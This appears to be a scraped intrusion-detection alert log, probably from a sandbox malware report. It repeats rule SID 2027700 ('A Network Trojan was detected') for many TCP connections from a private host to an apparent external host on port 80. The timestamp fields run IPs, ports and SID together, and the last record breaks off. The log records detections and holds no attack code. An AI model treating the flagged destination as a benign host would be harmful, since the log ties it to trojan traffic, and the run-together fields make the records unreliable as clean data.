                              Timestamp:192.168.2.762.204.41.450221802027700 02/06/23-18:38:12.187048
                              SID:2027700
                              Source Port:50221
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449885802027700 02/06/23-18:36:39.224150
                              SID:2027700
                              Source Port:49885
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450203802027700 02/06/23-18:38:06.492874
                              SID:2027700
                              Source Port:50203
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449796802027700 02/06/23-18:36:14.772959
                              SID:2027700
                              Source Port:49796
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450114802027700 02/06/23-18:37:43.360834
                              SID:2027700
                              Source Port:50114
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450091802027700 02/06/23-18:37:37.888527
                              SID:2027700
                              Source Port:50091
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450043802027700 02/06/23-18:37:25.122543
                              SID:2027700
                              Source Port:50043
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449946802027700 02/06/23-18:36:58.902146
                              SID:2027700
                              Source Port:49946
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450132802027700 02/06/23-18:37:47.847648
                              SID:2027700
                              Source Port:50132
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449857802027700 02/06/23-18:36:31.085635
                              SID:2027700
                              Source Port:49857
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450002802027700 02/06/23-18:37:14.985690
                              SID:2027700
                              Source Port:50002
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450209802027700 02/06/23-18:38:09.315255
                              SID:2027700
                              Source Port:50209
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449987802027700 02/06/23-18:37:08.994236
                              SID:2027700
                              Source Port:49987
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450104802027700 02/06/23-18:37:40.952667
                              SID:2027700
                              Source Port:50104
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450101802027700 02/06/23-18:37:40.235234
                              SID:2027700
                              Source Port:50101
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449831802027700 02/06/23-18:36:25.110774
                              SID:2027700
                              Source Port:49831
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449834802027700 02/06/23-18:36:25.833187
                              SID:2027700
                              Source Port:49834
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450012802027700 02/06/23-18:37:17.535420
                              SID:2027700
                              Source Port:50012
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450015802027700 02/06/23-18:37:18.281532
                              SID:2027700
                              Source Port:50015
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450364802027700 02/06/23-18:38:50.253164
                              SID:2027700
                              Source Port:50364
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449923802027700 02/06/23-18:36:51.342928
                              SID:2027700
                              Source Port:49923
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449742802027700 02/06/23-18:36:01.986509
                              SID:2027700
                              Source Port:49742
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450272802027700 02/06/23-18:38:24.734925
                              SID:2027700
                              Source Port:50272
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450349802027700 02/06/23-18:38:46.552442
                              SID:2027700
                              Source Port:50349
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450361802027700 02/06/23-18:38:49.540296
                              SID:2027700
                              Source Port:50361
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449745802027700 02/06/23-18:36:02.707219
                              SID:2027700
                              Source Port:49745
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450094802027700 02/06/23-18:37:38.590484
                              SID:2027700
                              Source Port:50094
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450097802027700 02/06/23-18:37:39.294548
                              SID:2027700
                              Source Port:50097
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450186802027700 02/06/23-18:38:02.145296
                              SID:2027700
                              Source Port:50186
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450183802027700 02/06/23-18:38:01.423474
                              SID:2027700
                              Source Port:50183
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449803802027700 02/06/23-18:36:18.277310
                              SID:2027700
                              Source Port:49803
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449770802027700 02/06/23-18:36:08.800628
                              SID:2027700
                              Source Port:49770
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450275802027700 02/06/23-18:38:26.060580
                              SID:2027700
                              Source Port:50275
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449758802027700 02/06/23-18:36:05.847456
                              SID:2027700
                              Source Port:49758
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449977802027700 02/06/23-18:37:06.464355
                              SID:2027700
                              Source Port:49977
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450028802027700 02/06/23-18:37:21.493237
                              SID:2027700
                              Source Port:50028
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450158802027700 02/06/23-18:37:55.451859
                              SID:2027700
                              Source Port:50158
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450117802027700 02/06/23-18:37:44.099592
                              SID:2027700
                              Source Port:50117
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450336802027700 02/06/23-18:38:41.486984
                              SID:2027700
                              Source Port:50336
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450288802027700 02/06/23-18:38:30.033697
                              SID:2027700
                              Source Port:50288
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450247802027700 02/06/23-18:38:18.501382
                              SID:2027700
                              Source Port:50247
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450206802027700 02/06/23-18:38:07.828165
                              SID:2027700
                              Source Port:50206
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449936802027700 02/06/23-18:36:56.541076
                              SID:2027700
                              Source Port:49936
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449806802027700 02/06/23-18:36:19.040858
                              SID:2027700
                              Source Port:49806
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449847802027700 02/06/23-18:36:28.712473
                              SID:2027700
                              Source Port:49847
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449888802027700 02/06/23-18:36:39.931255
                              SID:2027700
                              Source Port:49888
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449799802027700 02/06/23-18:36:15.767938
                              SID:2027700
                              Source Port:49799
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450170802027700 02/06/23-18:37:58.303705
                              SID:2027700
                              Source Port:50170
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449819802027700 02/06/23-18:36:22.168382
                              SID:2027700
                              Source Port:49819
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449908802027700 02/06/23-18:36:47.759181
                              SID:2027700
                              Source Port:49908
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450040802027700 02/06/23-18:37:24.355270
                              SID:2027700
                              Source Port:50040
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449949802027700 02/06/23-18:36:59.621008
                              SID:2027700
                              Source Port:49949
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450081802027700 02/06/23-18:37:35.445260
                              SID:2027700
                              Source Port:50081
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449783802027700 02/06/23-18:36:11.707389
                              SID:2027700
                              Source Port:49783
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450069802027700 02/06/23-18:37:32.561894
                              SID:2027700
                              Source Port:50069
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449920802027700 02/06/23-18:36:50.617008
                              SID:2027700
                              Source Port:49920
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450199802027700 02/06/23-18:38:05.327038
                              SID:2027700
                              Source Port:50199
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450314802027700 02/06/23-18:38:36.369028
                              SID:2027700
                              Source Port:50314
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450118802027700 02/06/23-18:37:44.342002
                              SID:2027700
                              Source Port:50118
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450216802027700 02/06/23-18:38:10.984165
                              SID:2027700
                              Source Port:50216
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449833802027700 02/06/23-18:36:25.603474
                              SID:2027700
                              Source Port:49833
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450007802027700 02/06/23-18:37:16.259881
                              SID:2027700
                              Source Port:50007
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449874802027700 02/06/23-18:36:36.510727
                              SID:2027700
                              Source Port:49874
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450049802027700 02/06/23-18:37:26.579536
                              SID:2027700
                              Source Port:50049
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450334802027700 02/06/23-18:38:41.003924
                              SID:2027700
                              Source Port:50334
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450363802027700 02/06/23-18:38:50.019719
                              SID:2027700
                              Source Port:50363
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449998802027700 02/06/23-18:37:12.834460
                              SID:2027700
                              Source Port:49998
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450245802027700 02/06/23-18:38:18.033800
                              SID:2027700
                              Source Port:50245
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450138802027700 02/06/23-18:37:50.675317
                              SID:2027700
                              Source Port:50138
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449744802027700 02/06/23-18:36:02.475154
                              SID:2027700
                              Source Port:49744
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449940802027700 02/06/23-18:36:57.476531
                              SID:2027700
                              Source Port:49940
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449785802027700 02/06/23-18:36:12.181176
                              SID:2027700
                              Source Port:49785
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450008802027700 02/06/23-18:37:16.510743
                              SID:2027700
                              Source Port:50008
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450204802027700 02/06/23-18:38:06.733576
                              SID:2027700
                              Source Port:50204
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450150802027700 02/06/23-18:37:53.545295
                              SID:2027700
                              Source Port:50150
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449839802027700 02/06/23-18:36:27.025983
                              SID:2027700
                              Source Port:49839
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449928802027700 02/06/23-18:36:53.692434
                              SID:2027700
                              Source Port:49928
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449969802027700 02/06/23-18:37:04.479000
                              SID:2027700
                              Source Port:49969
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450064802027700 02/06/23-18:37:30.054050
                              SID:2027700
                              Source Port:50064
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450208802027700 02/06/23-18:38:09.067569
                              SID:2027700
                              Source Port:50208
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450306802027700 02/06/23-18:38:34.417912
                              SID:2027700
                              Source Port:50306
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450162802027700 02/06/23-18:37:56.405411
                              SID:2027700
                              Source Port:50162
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450119802027700 02/06/23-18:37:44.576881
                              SID:2027700
                              Source Port:50119
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449944802027700 02/06/23-18:36:58.418493
                              SID:2027700
                              Source Port:49944
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449791802027700 02/06/23-18:36:13.602771
                              SID:2027700
                              Source Port:49791
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450220802027700 02/06/23-18:38:11.948249
                              SID:2027700
                              Source Port:50220
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450223802027700 02/06/23-18:38:12.656456
                              SID:2027700
                              Source Port:50223
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450125802027700 02/06/23-18:37:46.016414
                              SID:2027700
                              Source Port:50125
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449861802027700 02/06/23-18:36:32.032216
                              SID:2027700
                              Source Port:49861
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450217802027700 02/06/23-18:38:11.221533
                              SID:2027700
                              Source Port:50217
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449855802027700 02/06/23-18:36:30.616176
                              SID:2027700
                              Source Port:49855
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449953802027700 02/06/23-18:37:00.586145
                              SID:2027700
                              Source Port:49953
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450036802027700 02/06/23-18:37:23.421959
                              SID:2027700
                              Source Port:50036
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450134802027700 02/06/23-18:37:48.466411
                              SID:2027700
                              Source Port:50134
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449769802027700 02/06/23-18:36:08.538973
                              SID:2027700
                              Source Port:49769
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449858802027700 02/06/23-18:36:31.320590
                              SID:2027700
                              Source Port:49858
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450051802027700 02/06/23-18:37:27.043305
                              SID:2027700
                              Source Port:50051
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450181802027700 02/06/23-18:38:00.930275
                              SID:2027700
                              Source Port:50181
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450175802027700 02/06/23-18:37:59.517986
                              SID:2027700
                              Source Port:50175
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449925802027700 02/06/23-18:36:52.126736
                              SID:2027700
                              Source Port:49925
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450092802027700 02/06/23-18:37:38.122805
                              SID:2027700
                              Source Port:50092
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450319802027700 02/06/23-18:38:37.557364
                              SID:2027700
                              Source Port:50319
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449772802027700 02/06/23-18:36:09.270270
                              SID:2027700
                              Source Port:49772
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449801802027700 02/06/23-18:36:16.822547
                              SID:2027700
                              Source Port:49801
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449842802027700 02/06/23-18:36:27.765216
                              SID:2027700
                              Source Port:49842
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449972802027700 02/06/23-18:37:05.232422
                              SID:2027700
                              Source Port:49972
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450277802027700 02/06/23-18:38:27.380412
                              SID:2027700
                              Source Port:50277
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450236802027700 02/06/23-18:38:15.815189
                              SID:2027700
                              Source Port:50236
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450023802027700 02/06/23-18:37:20.267374
                              SID:2027700
                              Source Port:50023
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450147802027700 02/06/23-18:37:52.828888
                              SID:2027700
                              Source Port:50147
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449883802027700 02/06/23-18:36:38.704700
                              SID:2027700
                              Source Port:49883
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450106802027700 02/06/23-18:37:41.418242
                              SID:2027700
                              Source Port:50106
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450153802027700 02/06/23-18:37:54.264449
                              SID:2027700
                              Source Port:50153
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449788802027700 02/06/23-18:36:12.897781
                              SID:2027700
                              Source Port:49788
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449802802027700 02/06/23-18:36:18.022306
                              SID:2027700
                              Source Port:49802
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450130802027700 02/06/23-18:37:47.251536
                              SID:2027700
                              Source Port:50130
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449863802027700 02/06/23-18:36:32.512023
                              SID:2027700
                              Source Port:49863
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450225802027700 02/06/23-18:38:13.126471
                              SID:2027700
                              Source Port:50225
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450047802027700 02/06/23-18:37:26.104922
                              SID:2027700
                              Source Port:50047
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450286802027700 02/06/23-18:38:29.567763
                              SID:2027700
                              Source Port:50286
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450188802027700 02/06/23-18:38:02.626278
                              SID:2027700
                              Source Port:50188
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449976802027700 02/06/23-18:37:06.213926
                              SID:2027700
                              Source Port:49976
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450029802027700 02/06/23-18:37:21.731774
                              SID:2027700
                              Source Port:50029
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449820802027700 02/06/23-18:36:22.420698
                              SID:2027700
                              Source Port:49820
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449958802027700 02/06/23-18:37:01.789883
                              SID:2027700
                              Source Port:49958
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450258802027700 02/06/23-18:38:21.134137
                              SID:2027700
                              Source Port:50258
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450102802027700 02/06/23-18:37:40.471333
                              SID:2027700
                              Source Port:50102
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449798802027700 02/06/23-18:36:15.438757
                              SID:2027700
                              Source Port:49798
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449740802027700 02/06/23-18:36:01.508139
                              SID:2027700
                              Source Port:49740
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449891802027700 02/06/23-18:36:40.650924
                              SID:2027700
                              Source Port:49891
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449817802027700 02/06/23-18:36:21.693658
                              SID:2027700
                              Source Port:49817
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450243802027700 02/06/23-18:38:17.517772
                              SID:2027700
                              Source Port:50243
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450338802027700 02/06/23-18:38:41.974959
                              SID:2027700
                              Source Port:50338
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449835802027700 02/06/23-18:36:26.067781
                              SID:2027700
                              Source Port:49835
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450065802027700 02/06/23-18:37:30.338043
                              SID:2027700
                              Source Port:50065
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450261802027700 02/06/23-18:38:21.845480
                              SID:2027700
                              Source Port:50261
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450215802027700 02/06/23-18:38:10.750044
                              SID:2027700
                              Source Port:50215
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450083802027700 02/06/23-18:37:35.944831
                              SID:2027700
                              Source Port:50083
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450019802027700 02/06/23-18:37:19.314761
                              SID:2027700
                              Source Port:50019
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449986802027700 02/06/23-18:37:08.750839
                              SID:2027700
                              Source Port:49986
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450120802027700 02/06/23-18:37:44.810267
                              SID:2027700
                              Source Port:50120
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450014802027700 02/06/23-18:37:18.030710
                              SID:2027700
                              Source Port:50014
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449881802027700 02/06/23-18:36:38.196455
                              SID:2027700
                              Source Port:49881
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449886802027700 02/06/23-18:36:39.465156
                              SID:2027700
                              Source Port:49886
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450037802027700 02/06/23-18:37:23.652171
                              SID:2027700
                              Source Port:50037
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450055802027700 02/06/23-18:37:27.766285
                              SID:2027700
                              Source Port:50055
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450233802027700 02/06/23-18:38:15.078905
                              SID:2027700
                              Source Port:50233
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449935802027700 02/06/23-18:36:56.304075
                              SID:2027700
                              Source Port:49935
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450171802027700 02/06/23-18:37:58.553511
                              SID:2027700
                              Source Port:50171
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450202802027700 02/06/23-18:38:06.231570
                              SID:2027700
                              Source Port:50202
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450085802027700 02/06/23-18:37:36.424991
                              SID:2027700
                              Source Port:50085
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449843802027700 02/06/23-18:36:28.008839
                              SID:2027700
